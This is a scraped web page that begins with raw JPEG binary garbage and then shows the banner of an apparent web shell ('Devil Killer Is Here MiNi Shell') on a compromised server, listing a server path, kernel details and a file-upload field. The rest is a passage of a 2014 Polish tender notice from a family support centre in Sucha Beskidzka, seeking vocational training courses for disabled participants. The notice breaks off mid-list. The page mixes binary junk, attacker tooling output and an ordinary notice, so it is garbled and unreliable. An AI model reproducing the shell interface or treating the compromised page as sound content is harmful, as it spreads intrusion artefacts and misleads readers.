JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140509/100137-N-2014.html

<p class="kh_header"><b>Sucha Beskidzka: Przeprowadzenie szkoleń dla uczestników projektu Aktywni Mogą Więcej</b><br>
<b>Numer ogłoszenia: 100137 - 2014; data zamieszczenia: 09.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Kościelna 5b, 34-200 Sucha Beskidzka, woj. małopolskie, tel. 33 874 40 31, faks 33 874 40 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.suchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń dla uczestników projektu Aktywni Mogą Więcej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń dla uczestników projektu Aktywni Mogą Więcej według 12 zadań:
ZADANIE NR 1 - Zorganizowanie i przeprowadzenie szkolenia florystycznego  dla 7 osób niepełnosprawnych - uczestników projektu Aktywni Mogą Więcej
ZADANIE NR 2 - Zorganizowanie i przeprowadzenie szkolenia Kurs koparko-ładowarki dla 2 osób niepełnosprawnych - uczestników projektu  Aktywni Mogą Więcej.
ZADANIE NR 3 - Zorganizowanie i przeprowadzenie szkolenia Obsługa komputera dla 3  osób niepełnosprawnych - uczestników projektu Aktywni Mogą Więcej
ZADANIE NR 4 - Zorganizowanie i przeprowadzenie szkolenia Palacz kotłów co opalanych paliwem stałym dla 3 osób niepełnosprawnych - uczestników projektu Aktywni Mogą Więcej
ZADANIE NR 5 - Zorganizowanie i przeprowadzenie szkolenia Sprzedawca z obsługą kasy fiskalnej dla 8 osób w tym 5 osób niepełnosprawnych- uczestników projektu Aktywni Mogą Więcej
ZADANIE NR 6 - Zorganizowanie i przeprowadzenie szkolenia Kurs gastronomiczny z obsługą kasy fiskalnej dla  10 osób w tym 7 osób niepełnosprawnych - uczestników projektu Aktywni Mogą Więcej.
ZADANIE NR 7 - Zorganizowanie i przeprowadzenie szkolenia Kierowca operator wózków jezdniowych dla 4 osób w tym 3 osoby niepełnosprawne - uczestników projektu Aktywni Mogą Więcej
ZADANIE NR 8 - Zorganizowanie i przeprowadzenie szkolenia Kurs florystyczny z obsługą kasy fiskalnej dla 6 osób w tym 4 osoby  niepełnosprawne - uczestników projektu Aktywni Mogą Więcej.
ZADANIE NR 9 - Zorganizowanie i przeprowadzenie szkolenia Podstawy księgowości wspomagane komputerem dla 2 osób niepełnosprawnych -uczestników projektu Aktywni Mogą Więcej.
ZADANIE NR 10 - Zorganizowanie i przeprowadzenie Kursu ECDL dla 8 osób w tym   6 osób niepełnosprawnych - uczestników projektu Aktywni Mogą Więcej.
ZADANIE NR 11 - Zorganizowanie i przeprowadzenie Kursu języka angielskiego dla  średnio zaawansowanych dla 1 osoby- uczestnika projektu Aktywni Mogą Więcej.
ZADANIE NR 12 - Zorganizowanie i przeprowadzenie Kursu prawa jazdy kat. B dla 1 osoby - uczestnika projektu Aktywni Mogą Więcej.
Uczestnikami projektu są:
osoby niepełnosprawne w wieku aktywności zawodowej legitymujące się ważnym orzeczeniem o niepełnosprawności,  
rodzice dzieci niepełnosprawnych w wieku aktywności zawodowej wychowankowie opuszczający rodziny zastępcze
Szczegółowe informacje dotyczące przedmiotu zamówienia znajdują się w SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższego warunku będzie dokonywana metoda spełnia lub nie spełnia, w oparciu o dokumenty oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wskaże, iż dysponuje co najmniej 1 trenerem/instruktorem na dany kurs/szkolenie, który będzie je prowadził i który przeprowadził minimum 3 szkolenia, o podobnym charakterze jak prowadzone przez niego w niniejszym zamówieniu - odpowiednio na dane zadanie. Wykonawca winien załączyć wykaz osób, które będą wykonywać zamówienie (przewidzianych do realizacji) wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia oraz oświadczeniem, iż posiadają one wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. (warunek dotyczy wszystkich zadań). Ocena spełnienia powyższego warunku będzie dokonywana metoda spełnia lub nie spełnia, w oparciu o dokumenty, oświadczenia dołączone do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- zaakceptowany załącznik nr 5 do SIWZ (Istotne postanowienia umowy); 
- pełnomocnictwo (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo do dokonania zmian (stosownie do potrzeb oraz na wskutek powstałych zmian wynikłych z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy opisanych w SIWZ) w szczególności zmiany ilości godzin świadczenia usług oraz zmiany usługobiorców oraz ilości uczestników</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.suchabeskidzka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Suchej Beskidzkiej ul. Kościelna 5b, 34-200 Sucha Beskidzka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2014 godzina 10:30, miejsce: Powiatowe Centrum Pomocy Rodzinie w Suchej Beskidzkiej ul. Kościelna 5b, 34-200 Sucha Beskidzka - Dziennik Podawczy pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Projekt systemowy w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI, Priorytet VII Promocja integracji społecznej ,Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1 - Zorganizowanie i przeprowadzenie szkolenia florystycznego dla  uczestników projektu Aktywni Mogą Więcej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: zajęcia teoretyczne i praktyczne z zakresu materiałoznawstwa i technologii florystycznych (zasady kompozycji, botanika, materiał roślinny, układanie i dekoracje, florystyka ślubna, komunijna, żałobna).
Liczba godzin: co najmniej  40 godzin  (jedna godzina zajęć winna trwać 45 min.)Liczba uczestników: 7 osób niepełnosprawnych
Pozostałe informacje w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2 - Zorganizowanie i przeprowadzenie szkolenia Kurs koparko-ładowarki dla  uczestników projektu Aktywni Mogą Więcej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: Użytkowanie eksploatacyjne: podstawowe pojęcia z zakresu eksploatacji maszyn roboczych,  materiały eksploatacyjne, zadania operatora w procesie użytkowania koparko ładowarki.
Dokumentacja techniczna: wiadomości ogólne o rysunku technicznym, odczytywanie prostych schematów, dokumentacja techniczna.
BHP - podstawowe przepisy prawne dotyczące BHP i przeciw pożarowych, ochrona zdrowia pracowników i zadania służb BHP, podstawowe zasady higieny pracy, zasady bezpiecznej obsługi walców drogowych, ochrona przeciwpożarowa, pierwsza pomoc w nagłych wypadkach.
Podstawy elektrotechniki: podstawowe wielkości elektryczne, ogólne wiadomości o maszynach elektrycznych.
Silniki spalinowe: podział i budowa silników spalinowych, obsługa i eksploatacja silników spalinowych.
Elementy hydrauliki: ogólna informacja o napędach hydraulicznych, budowa hydraulicznych układów napędowych.
Budowa:  podział i parametry  podstawowe koparko ładowarek, ogólna budowa, działanie i regulacja.
Technologia robót: organizacja robót ziemnych, klasyfikacja gruntów, technika pracy koparkoładowarką, technologia robót koparko ładowarki.
Zajęcia praktyczne - instruktaż wstępny, przygotowanie koparko ładowarki do pracy, jazda, wykonywanie ruchów.
Liczba godzin: zgodnie z obowiązującymi przepisami w wymiarze 176 godzin (jedna godzina zajęć winna trwać 45 min.)
Liczba uczestników: 2 osoby niepełnosprawne
Pozostałe informacje w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3 - Zorganizowanie i przeprowadzenie szkolenia Obsługa komputera dla uczestników projektu Aktywni Mogą Więcej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka szkolenia: ogólna budowa komputera, BHP, system operacyjny, podstawy edytora tekstu,  arkusz kalkulacyjny, podstawy Internetu.
Liczba godzin: co najmniej  40 godzin  (jedna godzina zajęć winna trwać 45 min.)
Liczba uczestników: 3 osoby niepełnosprawne.
Pozostałe informacje w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 4 - Zorganizowanie i przeprowadzenie szkolenia Palacz kotłów co opalanych paliwem stałym dla uczestników projektu Aktywni Mogą Więcej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka szkolenia powinna obejmować m.in.: budowę kotłów wodnych wraz z osprzętem, budowę kotłów parowych wraz z osprzętem, proces spalania, automatykę i aparaturę pomiarową, zasady bhp i przeciw pożarowe, zasady racjonalnej gospodarki energetycznej, paliwa, paleniska, zasady eksploatacji kotłów. Przygotowanie do egzaminu na uzyskanie świadectwa kwalifikacyjnego w zakresie obsługi kotłów zgodnie z ustawą z dnia 10 kwietnia 1997r. - Prawo energetyczne (Dz.U.Nr 54, poz.348 z późń.zm.).
Liczba godzin: co najmniej  40 godzin  (jedna godzina zajęć winna trwać 45 min.)
Liczba uczestników: 3 osoby niepełnosprawne
Pozostałe informacje w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE NR 5 - Zorganizowanie i przeprowadzenie szkolenia Sprzedawca z obsługą kasy fiskalnej dla uczestników projektu Aktywni Mogą Więcej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: zajęcia teoretyczne i praktyczne z zakresu profesjonalnej sprzedaży i obsługi klienta, prowadzenia dokumentacji handlowej, rozpoznawania znaków pieniężnych, obsługa kasy fiskalnej i komputera w stopniu podstawowym oraz średniozaawansowanym, obsługa komputerowych programów sprzedażowych. 
Liczba godzin: co najmniej  40 godzin  (jedna godzina zajęć winna trwać 45 min.)
Liczba uczestników: 5 osób niepełnosprawnych, 2 rodziców dzieci niepełnosprawnych, 1 wychowanek pieczy zastępczej.
Pozostałe informacje w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE NR 6 - Zorganizowanie i przeprowadzenie szkolenia Kurs gastronomiczny z obsługą kasy fiskalnej dla uczestników projektu Aktywni Mogą Więcej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: zajęcia teoretyczne i praktyczne z zakresu gastronomii (w tym podstaw żywienia, technologii gastronomicznej, jakości i norm w zakresie obsługi gastronomicznej, minimum HACCAP), przyrządzania potraw, poznanie receptur, aranżacji, obsługa kasy fiskalnej w związku z prowadzonym lokalem gastronomicznym.
Liczba godzin: co najmniej  40 godzin  (jedna godzina zajęć winna trwać 45 min.)
Liczba uczestników: 7 osób niepełnosprawnych, 2 rodziców dzieci niepełnosprawnych, 1 wychowanek rodzinnej pieczy zastępczej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZADANIE NR 7 - Zorganizowanie i przeprowadzenie szkolenia Kierowca operator wózków jezdniowych dla  uczestników projektu Aktywni Mogą Więcej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: zajęcia teoretyczne i praktyczne z zakresu podziału stosowanych wózków, budowa wózków, wiadomości z zakresu bhp, czynności operatora przed w trakcie i po zakończeniu pracy, bezpieczne użytkowanie butli w tym ich bezpieczna wymiana, wiadomości z zakresu ładunkoznawstwa, wiadomości o dozorze technicznym, zajęcia praktyczne, w tym wymiana butli gazowych.
Zajęcia praktyczne powinny odbywać się przy użyciu  z odpowiedniej liczby maszyn do praktycznej nauki zawodu o stanie technicznym zapewniającym odpowiedni poziom kursu. Zamawiający prosi o  opis wyposażenia używanego podczas zajęć praktycznych) oraz dokładnym adresem i opisem miejsca realizacji zajęć praktycznych. Zajęcia teoretyczne i praktyczne powinny być prowadzone przez uprawnionych instruktorów. 
Liczba godzin: co najmniej  40 godzin  (jedna godzina zajęć winna trwać 45 min.) zgodnie z obowiązującymi przepisami.
Liczba uczestników: 3 osoby niepełnosprawne, 1 wychowanek rodzinnej  pieczy zastępczej.
Pozostałe informacje w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> ZADANIE NR 8 - Zorganizowanie i przeprowadzenie szkolenia Kurs florystyczny z obsługą kasy fiskalnej dla  uczestników projektu Aktywni Mogą Więcej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: zajęcia teoretyczne i praktyczne z zakresu materiałoznawstwa i technologii florystycznych (zasady kompozycji, botanika, materiał roślinny, układanie i dekoracje, florystyka ślubna, komunijna, żałobna), obsługa komputera i kasy fiskalnej w związku z prowadzeniem działalności gospodarczej w tym komputerowych programów sprzedażowych.
Liczba godzin: co najmniej  40 godzin  (jedna godzina zajęć winna trwać 45 min.) zgodnie z obowiązującymi przepisami.
Liczba uczestników: 4 osoby niepełnosprawne, 2 rodziców dzieci niepełnosprawnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> ZADANIE NR 9 - Zorganizowanie i przeprowadzenie szkolenia Podstawy księgowości wspomagane komputerem dla uczestników projektu Aktywni Mogą Więcej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka szkolenia:
Formy opodatkowania i ewidencji działalności gospodarczej w małych przedsiębiorstwach: przychody, koszty, dochód; zryczałtowany podatek dochodowy w formie karty podatkowej; ryczałt od przychodów ewidencjonowanych; opodatkowanie na zasadach ogólnych; zasady prowadzenia podatkowej księgi przychodów i rozchodów. Rozliczenia z ZUS: składki ZUS; dokumenty zgłoszeniowe; dokumenty rozliczeniowe. Podatek VAT: istota podatku VAT, ewidencja zakupów VAT - rejestr VAT zakupów, ewidencja sprzedaży VAT - rejestr VAT sprzedaży. Rozliczenia z urzędem skarbowym: deklaracje podatkowe. Obsługa programu symfonia mała księgowość: wstęp - podstawowe informacje o programie, przygotowanie programu do pracy (organizacja zabezpieczenia danych, obsługa baz danych w programie, rejestracja i aktywacja programu: tworzenie firmy, wprowadzanie danych początkowych firmy, wprowadzanie ustawień podatkowych, wprowadzanie ustawień dla składek ZUS, wprowadzanie wzoru księgowania, tworzenie rejestru pieniężnego, dodawanie i wybór roku); wprowadzanie informacji o zdarzeniach (remanenty, kontrahenci, pojazdy, pracownicy, środki trwałe, wyposażenie, składki ZUS właścicieli wprowadzanie bieżącego kursu walutowego, wprowadzanie dokumentów, rozliczanie pieniędzy, zamykanie miesiąca); wyniki ewidencji w programie (drukowanie zapisu - dowodu wewnętrznego, drukowanie zestawienia zapisów z KPiR, drukowanie zapisów rejestru sprzedaży i zakupów, tworzenie deklaracji podatkowych, korygowanie deklaracji podatkowych, e-Deklaracje, 